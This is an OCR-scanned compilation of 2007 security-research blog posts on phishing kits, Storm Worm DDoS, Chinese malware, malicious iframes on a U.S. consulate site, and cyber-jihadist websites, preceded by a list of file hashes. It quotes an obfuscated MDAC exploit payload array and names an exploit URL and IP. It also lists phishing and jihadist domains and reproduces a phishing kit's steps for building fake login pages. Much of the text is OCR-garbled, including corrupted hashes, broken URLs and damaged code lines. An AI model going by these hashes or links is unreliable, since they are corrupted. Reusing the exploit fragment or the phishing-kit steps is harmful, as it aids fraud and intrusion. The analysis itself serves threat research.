731bff80b494d3337ed41322ad5e8bd3 
winmov.ico 
18c58ac76371e7f5f0bd7757a4754c11 
wintool.ico 
6dc053a0cbd40d8c7ef064d658468f78 
Zipzip.ico 
6c5fd527c2646604da317eb189bec62f 
dc _msgbox.dpr 
b1144bfd907d18044c6990b84b78ab45 
dc msgbox.res 
b7ea2d977e055ea98279914cb750f2d0 
ClearLooks-BLUE.skn 
6b5eede231fe2360e609fabac1b70935 
ClearLooks-HUMAN.skn 
09a4fded9fd322ecdddc6491ddf5b35f 
corona-CORONA.skn 
321544b69d1639d623a20063ce9ce484 
corona-CORONA12.skn 
bd91lac37eee2a3ef900f0dbe65b3b43b 
Crystal Clear-CRCL1S.skn 
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4371487f2f2457013e169dcf9bed94ad 
DarkComet.skn 
85339e1c0d2347fa4966a7eac5b0745d 
Extensis-COPPER.skn 
7be0261d187ae7 8ae2da82df89c93468 
Extensis-EXTENSIS.skn 
68e92268fa4b7131481bb887be8086dd 
GNOME-Blue.skn 
4f1f519eaf0a316c3b6dcdd97a3e21d1 
GNOME-Gray.skn 
935a3e670bef8aab5b9864ee9d68a3fe 
GNOME-Green.skn 
1b10432d4cOcb9ffd3fdd4cd0b18b0ad 
GUIRelax-CINDER.skn 
58be805b95bd508becb43face451d72b 
GUIRelax-SKYMAN.skn 
4e483ca5a87b3a489182b2137d4d4a3b 
GUIRelax-SUBTLE.skn 
00fc419f38bc8497f9d3e28d0136984d 
iTunes.skn 
7871441a52a0fe7b63fcea24e59837f3 
LE4-BLACKC.skn 
59594d9d17e29e36d5a336e031laab21¢c 
LE4-DEFAULT.skn 
dc8498299calbb027040e292a78f53a6 
Longhorn DWM-DWM.skn 
3cf957721e522fbdee43468b17f6ea57 
Longhorn Slate-Plex-SLATE.skn 
ac64b991cb1e2f00bb76207396fed90e 
Longhorn Style-BLUE.skn 
c965396d6d424b0604519795224ee105 
Luna (Longhorn Revolution)-BLUE.skn 
f9454430c7eb51173b3596b2b4a6d588 
Luna (Longhorn Revolution)-HOMESTEAD.skn 
b94c2b1cd9fb293cb168bfe3d22c340f 
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Luna (Longhorn Revolution)-METALLIC.skn 
d5785da4aal1344cde14813df93ebb3dc 
Luna (Longhorn Revolution)-NEON.skn 
13779d0d3d007b635edce23f110ae904 
luna-BLUE.skn 
774d6a541bc4a88bcb4c169c9624de88 
luna-HOMESTEAD.skn 
fdd3979b4ac29b2f64da258c3b0a2399 
luna-METALLIC.skn 
851c715dd0dbb0413a7d90538141198a 
macos.skn 
9e5925399cbf958e3285df53c5225764 
MediaC-MEDIA1024.skn 
0a3e79ae6bal8e8366270270a2262d9d 
Mollis-BLUE.skn 
bfa788b65b5aabce7a005649d89a9fda 
MSN.skn 
87b457bb0a565901597aa87eae7c8b19 
mxp05.skn 
ef4cf84aba2b1a31ad15b84e47f3fa48 
mxpl.skn 6f63cabcl1e3c451773a8e73c9705bd11 
mxp2.skn 39095bb9b5fcfa96529b14bebf5829ac 
mxp3.skn f4cf139b15ca7069ff5e9b0697d79070 
mxskin03.skn 
73069f2cd6e4b1ab18f973f1050858ed 
mxskin10.skn 
2¢5511cb1b9a331ee45567b9fd1b0fe6 
mxskin11.skn 
a9b7d22543d36b44e91f387233f4acb8 
mxskin13.skn 
a80603df3f9063f4a0972222b6ec485c 
mxskin14.skn 
34d47679086057beal1ff2a7087ed2550 
mxskin15.skn 


567e30c6efee36c81c2flb3da68e38ba 
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mxskin16.skn 
eb2fca3c3525edfb597cd81c8403af0d 
mxskin17.skn 
0a425bce490a9b356d9048b19e2b3a8e 
mxskin18.skn 
fd58d8e0e777b4d53f72d5ee5bcd3386 
mxskin19.skn 
fda67405727ac74d1f57afeal5ea6d30 
mxskin2.skn 
06f0917fbb236acb613bb5066625cffb 
mxskin20.skn 
6e6d4dfc12c67cadd014b8b31b32e313 
mxskin21.skn 
f42fdc9d40d367954a3c56456993d2e8 
mxskin22.skn 
1ale008b4df78238eb41246df2afe98b 
mxskin23.skn 
f511f42a37b45d8e0b96aalc0a2463cb 
mxskin24.skn 
e1d005b6be5435786f60250e7a36ee7f 
mxskin25.skn 
40e6e78885c18ced76f3cfd85b36e182 
mxskin26.skn 
2b9a363294f3d66b9f76b30f13e23de4 
mxskin27.skn 
d969fe8d8a5a4d543442e6654071aeb6e 
mxskin28.skn 
80ce17364a6b9c0bf36c904d 70245016 
mxskin29.skn 
labdf4551268cad16e70el1c33ac82fc6 
mxskin30.skn 
cee61b5333c13283a763e88d67 72454 
mxskin31.skn 
1649543fbab8c69b3c13752ae892ba94 


mxskin32.skn 
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blogged about, however, both concepts are not mutually exclusive but apparently tend to 
work together. The DIY phishing kits on their part are largely used in the planning stage of 
the phishing campaign, that is, fake sites get generated and the data obtained forwarded 
to a single place, which is where Rock Phish starts getting used, namely, in the execution 
stage, where all the phishing pages generated get hosted on a single domain. Phishing 
efficiency vs [7]Rock Phish’s weakness due to centralization of numerous campaigns on a 
single domain - it’s the phishers’ trade-off. Within [8]the phishing ecosystem, there’s are 
numerous approaches phishers tend to use to achieve maximum efficiency, ones I’ve already 
discussed in a previous post. The most prolific problem to me remains phishing 1.0’s "push" 
model that is still remarkably successful compared to the [9]more advanced man in the middle 
phishing attacks and [10]pharming. From my perspective, if a financial institution really wants 
to protect its customers from phishing scams, it would first segment the threat, evaluate its 
customer’s perception of it and current level of awareness, and then start an educational 
Campaign aiming to not teach them how to recognize whether a site is a phish or not, but how 
to report and ignore the "push" models emails that arrive in their mailboxes. From another 
rather pragmatic perspective, phishers don’t just load images for their phish emails from the 
company’s website, but also the majority of phishing emails redirect to the real web site after 
the data was submitted - an early warning system by itself. 


ttp://ddanchev. blogspot .com/2007/07/confirm-your-gullibility htm 
ttp://www.phishtank.com/ 


ttp://www.dslreports.com/forum/r18762644-Rock-phish-information-continued~start=20 


ttp://www.dslreports.com/forum/r18762644-Rock-phish- inf ormation-continued~start=40 


1. 
2. 
3. 
4. 
5, hetp://adanchey-blogapot.con/200T /08/aiy-phihing Eitan 
6. hetp://adanchev. blogspot. con/2007/08/41j-phishing-its_29. ntl 

7. http://ddanchev. blogspot .com/2007/07/average-online-time-for-phishing-sites.htm 
8. http: //ddanchev . blogspot . com/2007/08/economics-of phishing. html 

9. http: //ddanchev . blogspot . com/2007/08/pharming- attacks-through-dns~cache htm] 


10. http://ddanchev. blogspot .com/2007/08/diy-pharming-tools.htm 


3.9.11 U.S Consulate St. Petersburg Serving Malware (2007-09-14 17:08) 


@ ST. PETERSBURG-RUSSIA 


If that’s not a pattern and good timing, it’s a malicious anomaly. On the 31 of August, 2007, 
[1]Bank of India was serving malware courtesy of the Russian Business Network. [2]This week, 
evidence that the [3]U.S Consulate in St. Petersburg, Russia was [4]serving malware to [5]its 


1057 


visitors proved [6]to be true. The web site is now clean, but assessing the IFRAME-ed URLs 
used in the attack is possible as they’re still reachable. It’s still unknown for long the IFRAMEs 
remain embedded at the Consulate’s web site, as well as when were they cleaned, but the 
attack was still active on the 2nd of September, 2007, just two days after Bank of India’s 
malware attack. It’s also worth mentioning that compared [7]to the most recent [8]malware 
embedded attacks which had the IFRAMEs directly embedded within, in this one the IFRAME 
itself is obfuscated but the live exploit URL isn’t. 


Tipped by a third-party, Sophos managed to locate the exact URL by deobfuscating the rather 
simple URL obfuscation, and [9]Fraser Howard posted some interesting details at their blog : 


"The purpose of the attacks is to infect victims with Trojans from the two attack sites. As 
discussed ina 
ia makePayLoad() 


var mdacPay = new Array( 

String. fromCharCode(123,66,68,57,54,67,53,53,54,45,54,53,65,51,45,49, 49,68, 45, 45,57,56,51,65, 45,48, 48,67,48,52,70,67,50,57,69,51,48,125), 
String. fromCharCode(123,66,68,57,54,67,53,53,54,45,54,53,65,51, 45,49, 49,68, 48, 45,57,56,51,65, 45,48, 48,67,48,52,70,67,50,57,69,51,54,125), 
String. fromCharCode(123,65,66,57,66,67,69,68,68,45,69,67,55,69,45,52,55,69,49,45,57,51,50,50,45,63,52,65,50,49,48,54,49,55,49,49,54,125), 
String fromCharCode(123,48,48,48,54,70,48,51,51,45,48, 48,48, 48,45, 48, 48, 48, 48, 45, 67, 48, 48,48, 45, 48,48, 48,48, 48,48,48,48,48,48,52,54,125), 
String.fromCharCode(123,48,48,48,54,70,48,51,65,45, 48,48, 48, 48, 45, 48, 48, 48, 48, 45,67, 48,48, 48,45,48,48,48,48,48,48,48,48,48,48,52,54,125), 
String. fromCharCode(123,54,101,51,50,48,55,48,97,45,55,54,54, 100,45,52, 101, 101,54,45,56,55,57,99, 45, 100,99, 49, 102,97,57,49, 100,50,102,99 
String. fromCharCode(123,54,52,49,52,53,49,50,66,45,66,57,55,56,45,52,53, 49,68, 45, 65, 48,68, 56, 45, 70,67, 70,68, 70,51,51,69,56,51,51,67,125), 
String.fromCharCode(123,55,70,53,66,55,70,54,51,45,70,48,54, 70,45,52,51,51,49,45,56,65,50,54,45,51,51,57,69,48,51,67,48,65,69,51,68,125), 
String. fromCharCode(123,48,54,55,50,51,69,48,57,45, 70,52,67,50,45,52,51,99,56,45,56,51,53,56,45,48,57, 70,67,68,49,68,66,48,55,54,54, 125), 
String. fromCharCode(123,54,51,57,70,55,50,53,70,45,49,66,50,68,45,52,56,51, 49, 45,65, 57, 70,68, 45,56,55,52,56,52,55,54,56,50,48,49,48,125), 
String.fromCharCode(123,66,65,48,49,56,53,57,57,45,49,68,66,51,45,52,52, 102,57,45,56,51,66,52,45,52,54,49,52,53,52,67,56,52,66, 70,56, 125) 
String. fromCharCode(123,68,48,67,48,55,68,53,54,45,55,67,54,57,45,52,51,70,49,45,66,52,65,48,45,50,53, 70,53,65,49,49, 70,65,66,49,57, 125), 
String. fromCharCode(123,69,56,67,67,67,68,68,70,45,67,65,50,56, 45,52,57,54, 98, 45,66, 48,53, 48, 45,54,67,48,55,67,57,54,50,52,55,54,66,125), 
String. fromCharCode(123,66,68,57,54,67,53,53,54,45,54,53,65,51,45,49, 49,68, 48, 45,57,56,51,65,45,48,48,67,48,52,70,67,50,57,69,51,48,125),1 
return mdacPay; 


recent paper, the increased use of automation to continually re-encrypt/pack/obfuscate the 
Trojans highlights the need for good generic detection technology. A system to continuously 
monitor these files in order to maintain detection is essential. So, to answer the question of 
whether the U.S. Consulate General site was specifically targeted in this attack - my answer 
is no, probably not. The prevalence of other much smaller sites compromised in exactly the 
same way (in just seven days worth of data) suggests that the hackers just happened to have 
caught a big fish as they trawled for vulnerable servers. It just goes to show that security is 
important on all machines hosting both small and large websites." 


We could greatly expand those as a matter of fact. The IFRAME used leads us to verymon- 
key.com/goof/index.php (209.123.181.185) and verymonkey.com/test/index.php which is ex- 
ploiting a modified MDAC, and aims to execute the following binary Virus.Win32.Zapchast.DA 


Detection rate : Result: 6/32 (18.75 %) 

AntiVir 2007.09.14 DR/Delphi.Gen 

AVG 2007.09.14 Obfustat.NP] 

eSafe 2007.09.13 Suspicious Trojan/Worm 

Ikarus 2007.09.14 Virus.Win32.Zapchast.DA 
VirusBuster 2007.09.13 Trojan.Agent.JVF 
Webwasher-Gateway 2007.09.14 Trojan.Delphi.Gen 


File size: 28672 bytes 
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MD5: a25ad0045d195016690b299bfb8b75d1 
SHA1: ab219c50b0adc84f702c696797e81411b6eab596 


Is this obfuscated IFRAME-ing a fad or a trend? | think it’s a trend since IFRAME-ing to a sec- 
ondary domain taking advantage of [10]popular web malware exploitation techniques is al- 
ready rated as suspicious by security vendors, and Google themselves warning you that "this 
site may harm your computer", and so they ought to win time. Moreover, such obfuscations 
are making it harder to assess how many sites and which ones exactly were victims of the 
attack in an OSINT manner. It gets even more interesting, the IP hosting verymonkey.com was 
[11]historically used to host banksoffscotland.co.uk scam web site in March this year. In case 
you wonder, it’s not the RBN that’s behind this [12]malware embedded attack, but let’s say 
it’s a subsidiary of the RBN. 


1. 

2 

3. 

4 

By 
6. 

7 
8. 
9. 


ttp://ddanchev .blogspot.com/2007/06/massive-embedded-web-attack-in-italy.htm 
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3.9.12 Storm Worm’s DDoS Attitude - Part Two (2007-09-17 11:26) 


OO2A 61 62 63 64 65 66 abcdef 
0030 67 68 69 6a 6b 6c 6d be 6f 70 71 72 OO OO 84 a2 ghijklmnopqr.... 
0040 d4 00 ?c a2 d4 00 4c a2 d4 00 Hy. | eBay 


After commenting on Storm Worm’s logical connection with the [1]recent DDoS attacks against 
anti-scam web sites, SecureWorks timely released details of what actions could [2]trigger a 
DDoS attack from Storm back at the researcher’s host and what type of DDoS attacks are 
launched exactly : 


"The attacks do show signs of being automated. Certain actions reliably trigger attacks. 
Investigators who can withstand the onslaught and have decided to test their theories (with 
cooperation from their ISPs, of course) can reliably trigger DDoS attacks on themselves. In one 
case, probing more than four unique Peacomm botnet HTTP proxies within ten seconds results 
in a flood of TCP SYN and ICMP packets, which last for about two hours. That’s all fairly regular." 


To me, this tactic is more of a "hey our situational awareness on your actions to shut us 
down is fairly food enough" type of statement, but why would the botnet masters risk expos- 
ing infected hosts compared to the opportunity to have them act like nothing’s in fact wrong 
with them? Mainly because if infected hosts were a scarce resource perhaps they would, but in 
Storm Worm’s case [3]the oversupply of infected hosts is allowing them to dedicate resources 
for automatic self-defensive DDoS. 
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1. http: //ddanchev. blogspot .com/2007/09/storm-worms-ddos- attitude. htm 


2. http: //www.secureworks.com/research/blog/index. php/2007/09/12/analysis-of-storm-worm-ddos-traffic/ 


3. http://blogs.zdnet .com/security/?p=49 


3.9.13 PayPal and Ebay Phishing Domains (2007-09-17 14:10) 


As | needed another benchmark for a creative typosquatting next to my best finding of this 
[1]World of Warcraft domain scam, | stumbled upon the following list of domains, where the 
most creative domain squatting is done solely for the purpose of including the domains within 
a typical phishing scam URL structure. Some of the domains are actual [2]Rock Phish ones 
that are currently hosting live phishing campaigns : 


paypal-online-account.com 
paypal-user-update.com 
paypal-supportl.com 
paypal-account-protection.com 
paypall-login.com 
paypal-accounts-update.com 


Some "creative" ones to be abused : 


paypal-aspx.com 

paypal-cgi3.info 

paypal-cmd.com 
paypal-comlwebscrc-login-run.com 
paypal-confirmation-id-0746795.com 


And since [3]PayPal is actually EBay after the acqusition, here’re some "creative" Ebay 
domain scams as well : 


ebay-com-isapidll.com 
ebayisapidll-cgi.com 
ebayisapidllaw2.com 
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ebayisapidilu.com 


[4]Authentication itself seems to be a priority as the customer must possess a tangible 
proof that her transactions’ security is somehow enhanced by a layered authentication, no 
doubt about it. But with phishers actively using a "push" model that is starting to visually social 
engineer the customers by registering domains imitating PayPal and EBay’s web application 
structure, authentication itself shouldn’t be a priority number one the way it is for the time 
being as phishers are not even trying to bypass it. 


Stats courtesy of the [5]Anti-Phishing Working Group. 


1, ftp: /danchev. blogspot con/ 2007/07 /world- of- varcraf¥-donain-acan heal 
2, htvp://ddanchey blogspot con/2007/08/208-host-Locked. heal 

3. hetp://nevs.con.con/2400-1017-941964. hem 

4, http://adanchey blogspot .con/2007/06/paypalis-security-key hal 

5 


. http://www.antiphishing.org/ 


3.9.14 A Chinese Malware Downloader in the Wild (2007-09-17 18:11) 
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This is an example of a recently released in the wild DIY downloader with rather average fea- 
tures such as the ability for the malware author to choose multiple locations of the files to be 
"dropped", as well as the time interval to check for the newly distributed binaries. The high de- 
tection rate of the downloader itself - Result: 23/32 (71.88 %) - is not the main point I’d like to 
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emphasize on, but rather that compared to the majority of [1]downloaders courtesy of Russian 
malware authors | come across to occasionally, this is a Chinese one. China is often blamed to 
be [2]the country hosting the highest percentage of malware in the world, however, China is 
also the country with highest percentage of infected PCs, and as we’ve seen with Storm Worm 
an infected host starts acting as both infection and propagation vector for the malware in ques- 
tion. As in any other local malware market, DIY tools get released so that script kiddies can 
generate enough noise to keep the [3]more sophisticated malware campaigns running behind 
the curtains. 


1. http://seclists.org/fulldisclosure/2007/Aug/0411.htm 
2. http: //news.com. com/Chinathoststnearlythalftoftall+malware+sites/2100-7349_3-6205896 .htm 
3. http: //ddanchev. blogspot .com/2007/09/storm-worms-fast-flux-networks.htm 


3.9.15 Two Cyber Jihadist Blogs Now Offline (2007-09-19 14:33) 


ee) pes 


a 
~~ se Cer - & « d . } 
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[1]Jinad Fields are Calling and [2]The Ignored Puzzle of Knowledge are down, apparently the 
authors themselves decided to delete them [3]compared to Wordpress [4]shutting down the 
[5]Global Islamic Media Front like it happened before. Ensuring that these "tip of the iceberg" 
[6]cyber jihadist communities stay offline has a long-term [7]PSYOPS effect on future wannabe 
cyber jihadists wanting to operate such communities, ones where talkers eventually turn into 
doers. 


, [ep /aajabdatpabseLat lah, wentpress. coal 
_http:/ /inshallahshaheed. vordpress.con/ 

. http: //ddanchev. blogspot . com/2007/07/gimf-switching-blogs. html 

_netp:/ /adanchev. blogspot .con/7007/08/ini-now-permanenty-shut~dowa al 
. http: //ddanchev. blogspot . com/2007/08/gimf-we-will-remain. htm] 


ttp://ddanchev. blogspot .com/2007/08/analyses-of-cyber- jihadist-forums-and.htm 


1 
2 
3 
4 
5 
6 
7 


. http: //ddanchev. blogspot .com/2006/09/internet-psyops-psychological.htm 
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3.9.16 Custom DDoS Capabilities Within a Malware (2007-09-19 16:02) 


DDoS capabilities within a malware are nothing new and are in fact becoming a commodity 
feature, but compared to the [l]average DDoS-ers with up to two different DoS attack 
approaches, or the types of malware with hardcoded IPs to be attacked, there’s a disturbing 
trend to diversify the DoS techniques used as much as possible to improve the chances of a 
successful attack, let’s not mention the [2]allocation of automatic self-defensive DDoS back 
at curious parties due to the oversupply of infected hosts. As you can see in this particular 
malware - high detection rate - the DDoS variables within are not only diverse enough to 
cause a lot of damage, but also, simultaneous combinations are also possible. 
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hkeasext 
| [ tir S FSB | 
RuaRetia: [1 (4) 
Now comes the digitally ugly part. [3]Open source malware results in many different variants 
with a huge variety of new modules and options implemented within, even worse, the software 
client can indeed mature into a web based malware C &C like the ones we’ve been seeing 
since the beginning of 2007. And this is exactly what happened with this open source malware 
- a Chinese hacking team is currently offering a Web builder for sale, making it possible to 
integrate the malware on the Web in a typical do-it-yourself fashion. What types of attacks 
are included anyway : 


- ICMP/SYN/TCP and UDP flooding 
- HTTP no-cache, GET flooding 
- CC variety 


- GAME, CIDR, Hybrid flooding capabilities 
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[4]The Black Sun bot, [5]the Cyber bot, [6]MPack, [7]IlcePack, [8]WebAttacker, the [9]Nuclear 
Malware Kit and [10]Zunker, are all Web based malware platforms and were originally released 
as such compared to the Web adaption of this one. 


CONAN RWNE 


http: //ddanchev. blogspot .com/2007/08/cyber- jihadist-dos-tool.htm 


. http: //ddanchev.blogspot .com/2007/09/storm-worms-ddos-attitude-part-two.htm 
. http: //www.packetstormsecurity.org/papers/general/malware-trends .pdf 


http: //ddanchev. blogspot .com/2007/04/shots-from-malicious-wild-west-sample_7672.htm 
http: //ddanchev.blogspot.com/2007/04/shots-from-malicious-wild-west-sample_20.htm 


http: //ddanchev.blogspot .com/2007/06/massive-embedded-web-attack-in-italy.htm 


http: //ddanchev. blogspot .com/2007/07/icepack-malware-kit-in-action. htm 


http: //ddanchev.blogspot.com/2007/05/webattacker-in-action. htm 
http: //ddanchev.blogspot.com/2007/08/nuclear-malware-kit.html 


10. http://ddanchev. blogspot .com/2007/09/google-hacking- f or-mpacks-zunkers-and.htm 


1065 


3.9.17 DIY Phishing Kit Goes 2.0 (2007-09-20 12:57) 


File Info 


Steps To Creating & Fake Login 


Go to your website or the site you have permission to make a 
fake web login and right-click then press “View Source" 
[Double Click Here To Begin] 


Enter the redirection URL. The redirection URL is the site in 
which the user who enters their login details will be forwarded 
to after they fill out the form. 


Advanced Mode - [Optional] For some websites after you 
create the phisher some images will not load properly. This is 
due to the source directing the images to be loaded from your 
database instead of their database, For example pou will 


>=""/images/image. To fix this you would 
have to direct the source to load from the site's database by 
editing the source to look a little like this 
<img stc="http: //site.com/images/image. aif''> 


To automatically do this, [Double Click Here] 
PS: Click The Numbers For The Details To Be Read Out Aloud 


With the release of the second version of the [1]DIY phishing kit that | covered in a previous 
post, next to commentary on [2]another one and a [3]DIY pharming tool, the timeframe for 
creating a phishing page just got shorter than it used to be before. Moreover, the phishing 
ecosystem is getting closer to fully achieving its malicious economies of scale, ones where the 
number of phishing campaigns in the wild outpaces the possibilities for timely shutting them 
down. Even worse, phishers do not seem to be interested in re-inventing the wheel, and having 
to create a new phishing page for any site or service, instead, such phishing pages are now a 
commodity, and with the ecosystem itself clearly cooperating with malware authors, you end 
up in a situation where a malware infected host is not just hosting malware for the next victim 
to get infected, running multiple DNS servers, sending out spam and phishing emails, but also, 
hosting the phishing pages themselves. 


Amateur phishers do not put efforts into ensuring the quality and the lifetime of their phishing 
Campaigns, and you 
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File Grab> Custom Replacement Simple Mode 


Advanced Mode 
t - 


nttp: ‘om 


\To beain using this you must click { Custom Replacement ] 
This will enable you to replace any text within the source box 
For Example 
Such As: Changing <img src=""/images/image. gi"'> to <img src="http:// /images/image. gif''> 


Paste Text | Save html Copy Text 


Generate 
Redirect To Which Website? 
|httpe?/ a = 


Save Logs On: |log. txt 


can clearly recognize such amateur campaign by visiting the phishing URL you’ve just re- 
ceived to figure out it’s already down. The more sophisticated phishers, however, are not 
just efficiency-obsessed, but also, take advantage of typosquatting and basic segmentation 
approaches, for instance, acquiring a Russian email database to use as the foundation for a 
WebMoney phishing campaign, and a U.S one for a PayPal one. Moreover, sophisticated phish- 
ers also put more efforts and invest more time into personalizing the emails and in rare cases, 
the phishing pages themsleves, that’s of course in between localizing the campaign by having 
it translated into the local language of the country for which the emails database belongs to, 
thus improving the chances of the campaign. This is yet another disturbing trend worth com- 
menting on - malware is maturing into a services centered economy, and so is the case with 
spamming and phishing, a logical development with the commodization of what used to very 
exclusive tools. 


1067 


hip  00t~<‘“‘i‘S;™S™S™S*”:C*CC | Clear | 
Name UR 


What are the major improvements in the new version? In the first one, the phisher had to 
manually paste the source code of the real page, have the kit automatically redirect the data 
to a third party URL, and also manually fix the image locations to ensure that they will load 
properly. In the second version, there’re POST and GET commands available so that the source 
code gets acquired automatically, and an internal Image Grabber so that the exact URLs of all 
the images within the login page can get easily integrated within the phishing page about to 
get generated. Getting back to differentiating the amateur from sophisticated phishers, the 
second have more resources at their disposal and better confidence in their hosting provider so 
that compared to loading the images from the original site, they’re hosting them locally. This kit 
will inevitably continue to evolve, wish it was proportionally with the end user’s understanding 
of how to protect against "push" phishing attacks though. 


Related posts: 


[4]The Phishing Ecosystem 
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[5]Confirm Your Gullibility 

[6]The Economics of Phishing 

[7]Pharming Attacks Through DNS Cache Poisoning 
[8]Average Online Time for Phishing Sites 
[9]Clustering Phishing Attacks 

[10]Phishing Domains Hosting Multiple Phishing Sites 
[11]209 Host Locked 

[12]PayPal and Ebay Phishing Domains 
[13]Spammers and Phishers Breaking CAPTCHAs 
[14]The Brandjacking Index 

[15]Take this Malicious Site Down - Processing Order.. 


[16]Taking Down Phishing Sites - A Business Model? 


,ep:/ /Adanchev, blogepot con/9007/08/diy-phishing- kite, heal 
_netp:/ /adanchev blogspot .con/2007/08/iy-phishing”kits. hea 
_http://adanchey.blogepot .con/2007/08/aiy-pharning-tools. heal 

_netp:/ /adanchev. blogspot .con/2007/02/ phishing ecosystem. nea 

_hetp:/ /adanchev.blogspot.con/2007/0T/contirn-your~gul1abs1sty tl 

| http://adanchey.blogepot .con/2001/08/econonice-of phishing. htal 

_netp:/ /adanchev. blogspot .con/2007/08/ harming attacks~through-asa-cache al 


ttp://ddanchev.blogspot.com/2007/07/average-online-time-for-phishing-sites.htm 


. http: //ddanchev.blogspot.com/2007/01/clustering-phishing-attacks.htm 


ttp://ddanchev. blogspot .com/2006/12/phishing-domains-hosting-multiple. htm 


12 
13, 


ttp://ddanchev. blogspot .com/2007/03/take-this-malicious-site-down.htm 
ttp://ddanchev. blogspot .com/2007/04/taking- down-phishing-sites- business .htm 
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3.9.18 The Truth Serum - Have a Drink! (2007-09-21 15:50) 


Which security vendor would you rather choose if you were to ignore your current [1]Return on 
Security Investment model? The one telling you "everything’s under control" , that "malicious 
attackers are loosing creativity and cannot bypass our security solutions", or the one who’s 
attitude is "our solutions fully demonstrate marginal thinking in respect to fighting cyber 
threats, namely, they mitigate certain risks and limit the probability for a security incident, 
but do not and cannot provide 100 % security"? 


Basic human psychology and purchasing habits would stick to the first one, the one pre- 
tending to offer 100 % security - something even a condom cannot offer yet everyone’s 
thankfully using them. Even worse, which is falling victim into the myopia that the market 
leader, or the company with the highest brand equity is actually the one worth doing business 
with. As it appears, McAfee CEO David DeWalt had a drink from the truth serum before 
InformationWeek’s 500 Conference in order to comment that "We’re in inning two of a 
nine-inning game here" in respect to how [2]cyber threats often outpace security measures. 
Moreover, an year ago | commented on a Gartner analyst’s statement that [3]security is all 
about percentage of budget allocation, and therefore the more you spend the more secure 
you get, among the most common myopias nowadays. Now, Gartner vice-president John 
Pescatore is [4]wisely insisting that companies spend less on IT security, and given how when 
Gartner sneezes the whole industry gets cold, it’s a step in the right direction - debunking 
common security myopias. 


In a world dominated by [5]perimeter defense solutions, being a visionary realist is an 
objective luxury. 


1. http: //ddanchev. blogspot .com/2006/05/valuing-security-and-prioritizing-your.htm 


2. http: //www.itnews.com.au/News/61497 , cyberthreats-outpace-security-measures-says-mcafee-ceo.aspx 


3. http: //ddanchev. blogspot .com/2006/07/budget-allocation-myopia-and. htm 


3.9.19 The Dark Web and Cyber Jihad (2007-09-24 13:56) 
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It’s interesting to monitor the use and abuse of the buzz word "[1]Dark Web". This press 
release for instance, tries to imply that the [2]crawlers are actually crawling the Dark Web and 
analyzing cyber jihadist activities, a bit of an awkward statement given what [3]the Dark Web 
is at the bottom line - a web that is closed for web crawlers either thought standard measures, 
or authentication : 


"This is where the Dark Web project comes in. Using advanced techniques such as Web 
spidering, link analysis, content analysis, authorship analysis, sentiment analysis and mul- 
timedia analysis, Chen and his team can find, catalogue and analyze extremist activities 
online. According to Chen, scenarios involving vast amounts of information and data points 
are ideal challenges for computational scientists, who use the power of advanced computers 
and applications to find patterns and connections where humans can not. One of the tools de- 
veloped by Dark Web is a technique called Writeprint, which automatically extracts thousands 
of multilingual, structural, and semantic features to determine who is creating ‘anonymous’ 
content online. Writeprint can look at a posting on an online bulletin board, for example, and 
compare it with writings found elsewhere on the Internet. By analyzing these certain features, 
it can determine with more than 95 percent accuracy if the author has produced other content 
in the past. The system can then alert analysts when the same author produces new content, 
as well as where on the Internet the content is being copied, linked to or discussed." 


I’ve [4]blogged about this Al project over an year ago, and have been following it ever 
since while experimenting with [5]link and multimedia analysis of cyber jihadist communities 
before [6]they were shut down. And while the innovations they’ve introduced for this period 
are impressive in terms of drawing social networking maps, the Dark Web’s very principle, 
namely that it’s authentication only Web, meaning it’s closed for spiders, even human 
based researchers thought basic invite only or password authentication methods will prompt 
researchers to adapt in the long-term. Many of the cyber jihadist forums | didn’t include in 
my last external links extraction were great examples of the dark cyber jihadist web, knowing 
where you crawl doesn’t mean there’ll be anything publicly available to crawl, and the trend 
is just starting to emerge. Such VIP clubs represent closed communities where more efforts 
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should be put in taking a peek, thus it’s ruining previous efficiency centered approaches of 
analyzing cyber jihadist communities. The alternatives remain rather contradictive but fully 
realistic - [7]infecting terrorist suspects with malware, [8]embedding malware within cyber 
jihadist communities, or unethically pen-testing the cyber jihadist communities to have the Al 
analyze the data obtained from the closed community, thus the Dark Web, at a later stage. 


Meanwhile, after having the [9]Global Islamic Media Front’s online presence limited to 
the minimum, GIMF is making it in the mainstream media : 


"On sites easily traceable via search engines, the German-language arm of the "Global 
Islamic Media Front" (GIMF) appeals for volunteer translators, inviting them to reply to a 
Hotmail address, and posts links to dozens of al Qaeda videos. "After some brothers and 
sisters were arrested (may Allah free them) and the Forum and blog of the GIMF were removed, 
we say this: the GIMF still exists and will continue its work," a statement from the front says. 
"To the Kuffar (infidels) who try to fight us, we say: you can do what you like, make as many 
arrests as you like...you will not reach your goal. We will always keep going until we achieve 
victory or martyrdom."The re-emergence of the GIMF in German highlights the difficulty for 
authorities of shutting down radical Islamist Web sites, which often simply spring up at new 
addresses." 


Easily traceable mainly because they’re not behind the Dark Web, at least not for now. 
Currently active GIMF URLs : 


gimf.12gbfree.com 

gimf.22web.net 

gimf.cjb.net 

gimfupload.blogspot.com with two redirectors gimfupload.notlong.com ; gimfupload.2ya.com 


Despite that there’re still literally hundreds of cyber jihadist forums and sites, quantity 
is not always equal to quality, namely, only a few of these will achieve success and mature 
into potentially dangerous communities. In the long term, however, once the "tip of the 
iceberg" communities dissapear, efficiency from the cyber jihadists will get sacrificed for 
improved OPSEC, namely they’ll start operating behind the true Dark Web, making them more 
difficult and time-consuming to assess, track down, and shut down. 


UPDATE: [10]Inshallahshaheed (GIMF) has a new home. 


1. http: //en.wikipedia.org/wiki/Dark_internet 

2. http: //www.nsf.gov/news/news_summ. jsp?cntn_id=110040é0rg=NS 

3. http: //blogs.zdnet . com/BTL/7p=6253 

4. http: //ddanchev. blogspot . com/2006/05/techno-imperialism-and-effect-of . htm] 


5. http: //ddanchev. blogspot .com/2007/08/analyses-of-cyber- jihadist-forums-and.htm 
6. http: //ddanchev. blogspot .com/2007/09/two-cyber- jihadist-blogs-now-offline.htm 


7. http: //ddanchev. blogspot .com/2007/09/infecting-terrorist-suspects-with.htm 
8. http: //ddanchev. blogspot .com/2007/09/popular-web-malware-exploitation.htm 


9. http://www. reuters .com/article/worldNews/idUSL2179642220070921?feedType=RSS&feedName=worldNews&sp=true 


10. http://blackflag. wordpress .com/2007/09/26/inshallahshaheed-gimf-has-a-new-home/ 
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3.9.20 Localizing Open Source Malware (2007-09-26 09:21) 
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Can you find the differences in this piece of malware compared to [1]the previous open source 
one | covered recently? Besides its localization to Chinese there aren’t any, and this develop- 
ment clearly demonstrates the dynamics of the malware scene. A common Web 2.0 mentality 
is that the more people use the service, the better it gets, a mode of thinking we could see 
applied in the case of open source malware, and [2]malware as a web service. Once the source 
